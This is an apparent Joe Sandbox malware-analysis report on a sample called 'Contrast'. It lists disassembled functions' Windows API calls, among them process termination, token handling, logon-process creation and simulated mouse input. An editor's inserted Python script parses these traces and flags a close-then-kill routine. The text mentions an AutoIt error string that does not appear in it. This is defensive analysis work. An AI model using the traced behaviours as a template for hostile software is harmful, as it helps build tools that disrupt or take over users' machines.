                                                                                                                                        • Instruction ID: d11fefbc0eab7ff70dc0f5a1c9829278d9caedef690dae75309b8b1048539133
                                                                                                                                        • Opcode Fuzzy Hash: aba62ecc3e5dd5e75f4f6766b208877f6d8459a3a134c1d3a1cefbed7b2630fd
                                                                                                                                        • Instruction Fuzzy Hash: 814195301046059FE720DF24CC88FEA7FE8FB59364F1405AAF695872A1D7309C49EB65
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(005D77B0,00000000,00FE5C40,?,?,005D77B0,?,0059BC1A,?,?), ref: 0059BD84
                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 0059BDA8
                                                                                                                                        • ShowWindow.USER32(005D77B0,00000000,00FE5C40,?,?,005D77B0,?,0059BC1A,?,?), ref: 0059BE08
                                                                                                                                        • ShowWindow.USER32(?,00000004,?,0059BC1A,?,?), ref: 0059BE1A
                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 0059BE3E
                                                                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0059BE61
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 642888154-0
                                                                                                                                        • Opcode ID: eff0b489ca909e11c7cbd98ed11b5d39f4ae47515a87109c6faa51b2a29d1d55
                                                                                                                                        • Instruction ID: 7f2cb787391fc6c1d2ef49586dd384013740fdc01570c79bc1b783bdbc73a112
                                                                                                                                        • Opcode Fuzzy Hash: eff0b489ca909e11c7cbd98ed11b5d39f4ae47515a87109c6faa51b2a29d1d55
                                                                                                                                        • Instruction Fuzzy Hash: 5A415B74600244AFFF22CF68D689B947FF5FF06714F1841A9EA488F2A2C731A845CB91
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,0058550C,?,?,00000000,00000001), ref: 00587796
                                                                                                                                          • Part of subcall function 0058406C: GetWindowRect.USER32(?,?), ref: 0058407F
                                                                                                                                        • GetDesktopWindow.USER32 ref: 005877C0
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 005877C7
                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 005877F9
                                                                                                                                          • Part of subcall function 005757FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00575877
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00587825
                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00587883
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4137160315-0
                                                                                                                                        • Opcode ID: 8e839806843a77197f916f7192c02c371d51f09edd281900f3b15077eb774f82
                                                                                                                                        • Instruction ID: 824d27d9a374dfb618b8a96562a396e234042a9f02475456006d2cbdd2bcf1ea
                                                                                                                                        • Opcode Fuzzy Hash: 8e839806843a77197f916f7192c02c371d51f09edd281900f3b15077eb774f82
                                                                                                                                        • Instruction Fuzzy Hash: A931D672508305ABD710EF14D849F5B7B99FFC9354F100919F989A7181DB70E909CF92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00568CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00568CDE
                                                                                                                                          • Part of subcall function 00568CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00568CE8
                                                                                                                                          • Part of subcall function 00568CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00568CF7
                                                                                                                                          • Part of subcall function 00568CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00568CFE
                                                                                                                                          • Part of subcall function 00568CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00568D14
                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000000,0056904D), ref: 00569482
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0056948E
                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00569495
                                                                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 005694AE
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0056904D), ref: 005694C2
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005694C9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3008561057-0
                                                                                                                                        • Opcode ID: 0790b98ce4d4b528f81516d1bc8fd3bb14b9c6eb8ad08b3ee56559ab6b52b8df
                                                                                                                                        • Instruction ID: 17690acdf573be3505ea6793e6ac8184bbed9dfbb8db6a5da39ae4b17ccf9be8
                                                                                                                                        • Opcode Fuzzy Hash: 0790b98ce4d4b528f81516d1bc8fd3bb14b9c6eb8ad08b3ee56559ab6b52b8df
                                                                                                                                        • Instruction Fuzzy Hash: 8311AC32611604EFDF109FA4CC49BBE7BADFF56326F108118E84597250CB36A945EB60
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00569200
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00569207
                                                                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00569216
                                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00569221
                                                                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00569250
                                                                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00569264
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1413079979-0
                                                                                                                                        • Opcode ID: fe087032089fca8a4d31a4fc7a9df16aaab26bb4c6e9a535efd0848ee4046230
                                                                                                                                        • Instruction ID: 92e245a384eb8d0d115b9769a7fb48fac50afaed69156054d955fae3546c533d
                                                                                                                                        • Opcode Fuzzy Hash: fe087032089fca8a4d31a4fc7a9df16aaab26bb4c6e9a535efd0848ee4046230
                                                                                                                                        • Instruction Fuzzy Hash: 4511447650124AABDF018FA4ED49BDA7BADFF4A304F144025FA04A21A0C2769E64EB60
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0056C34E
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0056C35F
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0056C366
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0056C36E
                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0056C385
                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0056C397
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1035833867-0
                                                                                                                                        • Opcode ID: 85ad60c5328eccbbd2928384b5990c7529d973b9b64d34df15d1edd6713899eb
                                                                                                                                        • Instruction ID: 8db2c99e66d5acf14f6eb787a1db3745cc2b3c14e749d1d64c5e7b812ba6a70a
                                                                                                                                        • Opcode Fuzzy Hash: 85ad60c5328eccbbd2928384b5990c7529d973b9b64d34df15d1edd6713899eb
                                                                                                                                        • Instruction Fuzzy Hash: 02014F75E00219BBEF109BA69C49A5EBFB8EB59761F004065FA08AB280D6709D14DFA0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005116CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00511729
                                                                                                                                          • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511738
                                                                                                                                          • Part of subcall function 005116CF: BeginPath.GDI32(?), ref: 0051174F
                                                                                                                                          • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511778
                                                                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0059C57C
                                                                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 0059C590
                                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0059C59E
                                                                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 0059C5AE
                                                                                                                                        • EndPath.GDI32(00000000), ref: 0059C5BE
                                                                                                                                        • StrokePath.GDI32(00000000), ref: 0059C5CE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 43455801-0
                                                                                                                                        • Opcode ID: c0109932dd8cf65d155296b39a3969ac193981a875439aa15c8bca36b2ab7c35
                                                                                                                                        • Instruction ID: 98c28dce9f7e9d6fe8461ba959234bd470f2e89d52cca927a12cefc3563792a8
                                                                                                                                        • Opcode Fuzzy Hash: c0109932dd8cf65d155296b39a3969ac193981a875439aa15c8bca36b2ab7c35
                                                                                                                                        • Instruction Fuzzy Hash: DA11DE7600010DBFDF129F90DC48FDA7FADFB19354F048452BA19561A0D771AE59EBA0
                                                                                                                                        APIs
                                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 005307EC
                                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 005307F4
                                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 005307FF
                                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0053080A
                                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00530812
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0053081A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4278518827-0
                                                                                                                                        • Opcode ID: 155793cee7edd6435879ae2374a40aa56e62b78a96db37ce6caa1c53e0ddcfbe
                                                                                                                                        • Instruction ID: 94e71dc39052b244d4387e6a4cf6fb4ed17ad669a2babd4563eee39437067e52
                                                                                                                                        • Opcode Fuzzy Hash: 155793cee7edd6435879ae2374a40aa56e62b78a96db37ce6caa1c53e0ddcfbe
                                                                                                                                        • Instruction Fuzzy Hash: 25016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A868CBE5
                                                                                                                                        APIs
                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005759B4
                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 005759CA
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 005759D9
                                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005759E8
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005759F2
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005759F9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 839392675-0
                                                                                                                                        • Opcode ID: c4b7549a41f0416a3bf71f7570cf1e85fbddf6fce853c5b5a3f407dc99beacf0
                                                                                                                                        • Instruction ID: 5f60b31b419543013275331e56ab571898e68dc62c8df64888f90af4cb96fb3e
                                                                                                                                        • Opcode Fuzzy Hash: c4b7549a41f0416a3bf71f7570cf1e85fbddf6fce853c5b5a3f407dc99beacf0
                                                                                                                                        • Instruction Fuzzy Hash: CAF01D32251158BFE7215B929C0DEEF7A7CEBD7B15F000159FA0592090E7A01A16E6B5
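The function listed directly above sends message 0x10 (WM_CLOSE) to a window with PostMessageW and SendMessageTimeoutW (flag 0x2 is SMTO_ABORTIFHUNG, 0x1F4 is a 500 ms timeout), then resolves the owning process with GetWindowThreadProcessId, opens it with access mask 0x1F0FFF (PROCESS_ALL_ACCESS) and calls TerminateProcess: a "close politely, then kill" routine consistent with the WinKill of the AutoIt runtime this sample is built on (see the AUTOIT.ERROR string further down). Note that the sandbox prints whatever sits on the stack past each API's real parameters, so OpenProcess is shown with sixteen "arguments" although only the first three are meaningful. The Python below is an added example by the editor, not part of the Joe Sandbox report or of the sample: it parses API bullets in this report's format, trims each call to its true arity, names the well-known constants (values taken from the Windows SDK headers; the arity table is assumed for the APIs seen here), and flags the WM_CLOSE-then-TerminateProcess sequence. The sample lines are copied from the function entries on this page; the MapVirtualKeyW line from the entry above shows the VK_* decoding as well.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One "APIs" bullet of a Joe Sandbox IDA-plugin function entry, for example:
#   • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 005759E8
#   • _memset.LIBCMT ref: 0057332E
#     • Part of subcall function 005771F0: CloseHandle.KERNEL32(00000000,?), ref: 005771FA
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Real parameter counts (assumed table for the APIs seen in this report). The
# sandbox prints stack residue past the last argument; only these are meaningful.
ARITY: Dict[str, int] = {
    "PostMessageW": 4, "SendMessageW": 4, "SendMessageTimeoutW": 7,
    "GetWindowThreadProcessId": 2, "OpenProcess": 3, "TerminateProcess": 2,
    "CloseHandle": 1, "MapVirtualKeyW": 2, "TerminateThread": 2,
    "WaitForSingleObject": 2,
}

# Constant names from the Windows SDK headers (winuser.h, winnt.h).
WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x0188: "LB_GETCURSEL",
                   0x0189: "LB_GETTEXT", 0x018A: "LB_GETTEXTLEN"}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
                0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
# (API name, zero-based argument index) -> names for that argument
ARG_NAMES = {
    ("PostMessageW", 1): WINDOW_MESSAGES,
    ("SendMessageW", 1): WINDOW_MESSAGES,
    ("SendMessageTimeoutW", 1): WINDOW_MESSAGES,
    ("SendMessageTimeoutW", 4): {0x0002: "SMTO_ABORTIFHUNG"},
    ("OpenProcess", 0): {0x001F0FFF: "PROCESS_ALL_ACCESS"},
    ("MapVirtualKeyW", 0): VIRTUAL_KEYS,
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]     # None where the sandbox printed "?"
    ref: int                      # address of the call site
    subcall_of: Optional[str]     # set for "Part of subcall function X" lines


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the API bullets of one function entry; non-matching lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        api = m.group("api")
        args: List[Optional[int]] = []
        if m.group("args"):
            for tok in m.group("args").split(","):
                tok = tok.strip()
                args.append(None if tok == "?" else int(tok, 16))
        args = args[: ARITY.get(api, len(args))]   # drop stack residue
        calls.append(ApiCall(api, m.group("module"), args,
                             int(m.group("ref"), 16), m.group("sub")))
    return calls


def describe(call: ApiCall) -> str:
    """Render a call with known constants named."""
    parts = []
    for i, v in enumerate(call.args):
        if v is None:
            parts.append("?")
        else:
            name = ARG_NAMES.get((call.api, i), {}).get(v)
            parts.append(f"{name}(0x{v:X})" if name else f"0x{v:X}")
    return f"{call.api}({', '.join(parts)}) @ {call.ref:08X}"


def is_forced_window_kill(calls: List[ApiCall]) -> bool:
    """True when WM_CLOSE is sent to a window and, later in the same function,
    the owning process is looked up, opened and terminated."""
    steps = ["WM_CLOSE", "GetWindowThreadProcessId", "OpenProcess", "TerminateProcess"]
    pos = 0
    for c in calls:
        if steps[pos] == "WM_CLOSE":
            hit = (c.api in ("PostMessageW", "SendMessageW", "SendMessageTimeoutW")
                   and len(c.args) > 1 and c.args[1] == 0x0010)
        else:
            hit = c.api == steps[pos]
        if hit:
            pos += 1
            if pos == len(steps):
                return True
    return False


# Lines copied from the function entries in this report (not constructed).
SAMPLE_LINES = """
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005759B4
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 005759CA
• GetWindowThreadProcessId.USER32(?,?), ref: 005759D9
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005759E8
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005759F2
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 005759F9
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 005307EC
• _memset.LIBCMT ref: 0057332E
  • Part of subcall function 005771F0: CloseHandle.KERNEL32(00000000,?,00577836,?,0051C2B6,?,?), ref: 005771FA
"""

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    for c in parsed:
        print(describe(c))
    print("forced window kill:", is_forced_window_kill(parsed))
```

Feed it the "APIs" bullets of any function entry in this report; calls with an unknown API keep all printed arguments, so extend ARITY before trusting the decoded argument list of a new function.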
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 005777FE
                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,0051C2B6,?,?), ref: 0057780F
                                                                                                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,0051C2B6,?,?), ref: 0057781C
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0051C2B6,?,?), ref: 00577829
                                                                                                                                          • Part of subcall function 005771F0: CloseHandle.KERNEL32(00000000,?,00577836,?,0051C2B6,?,?), ref: 005771FA
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0057783C
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,0051C2B6,?,?), ref: 00577843
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3495660284-0
                                                                                                                                        • Opcode ID: 9f1a28f3d7a95c3f15c1d81558188fbdf54297f0dfec5e5a3a5f742841ab3d81
                                                                                                                                        • Instruction ID: 67c1d58819b4df9d35bb2b69e926d3c6cc851ce10eee91e47ddd422136151a9a
                                                                                                                                        • Opcode Fuzzy Hash: 9f1a28f3d7a95c3f15c1d81558188fbdf54297f0dfec5e5a3a5f742841ab3d81
                                                                                                                                        • Instruction Fuzzy Hash: 25F05E36155312ABD7112B64FC8CAEB7B29FF5A302F146421F102950E0CBB59809EB61
                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00569555
                                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00569561
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0056956A
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00569572
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0056957B
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00569582
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 146765662-0
                                                                                                                                        • Opcode ID: 9ab9c490270412dd9811597209e939a6cbcdeb537ea1ae0b72ef31420da839d7
                                                                                                                                        • Instruction ID: e5f0069338f8e7d8436b5e557d69dd47a9f5dc99953db70d22223e123934cbdd
                                                                                                                                        • Opcode Fuzzy Hash: 9ab9c490270412dd9811597209e939a6cbcdeb537ea1ae0b72ef31420da839d7
                                                                                                                                        • Instruction Fuzzy Hash: 1BE0E536114101BFDB011FE1EC0C99ABF39FF6A722B105621F215810B0CB72A469EF90
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00588CFD
                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00588E0C
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00588F84
